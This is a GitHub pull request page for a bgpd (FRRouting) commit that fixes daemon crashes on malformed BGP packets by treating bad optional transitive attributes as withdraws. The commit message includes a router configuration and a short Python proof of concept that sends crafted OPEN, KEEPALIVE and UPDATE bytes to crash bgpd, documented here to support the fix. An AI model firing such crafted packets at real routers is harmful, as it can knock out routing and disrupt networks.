Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
bgpd: A couple more bgpd crash fixes for malformed packets #14716
bgpd: A couple more bgpd crash fixes for malformed packets #14716
Changes from 1 commit
6814f2ec37119dFile filter
Filter by extension
Conversations
Jump to
…attrs Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be processed as a normal UPDATE without mandatory attributes, that could lead to harmful behavior. In this case, a crash for route-maps with the configuration such as: ``` router bgp 65001 no bgp ebgp-requires-policy neighbor 127.0.0.1 remote-as external neighbor 127.0.0.1 passive neighbor 127.0.0.1 ebgp-multihop neighbor 127.0.0.1 disable-connected-check neighbor 127.0.0.1 update-source 127.0.0.2 neighbor 127.0.0.1 timers 3 90 neighbor 127.0.0.1 timers connect 1 ! address-family ipv4 unicast neighbor 127.0.0.1 addpath-tx-all-paths neighbor 127.0.0.1 default-originate neighbor 127.0.0.1 route-map RM_IN in exit-address-family exit ! route-map RM_IN permit 10 set as-path prepend 200 exit ``` Send a malformed optional transitive attribute: ``` import socket import time OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" b"\x80\x00\x00\x00") KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.2', 179)) s.send(OPEN) data = s.recv(1024) s.send(KEEPALIVE) data = s.recv(1024) s.send(UPDATE) data = s.recv(1024) time.sleep(100) s.close() ``` Reported-by: Iggy Frankovic <iggyfran@amazon.com> Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>There are no files selected for viewing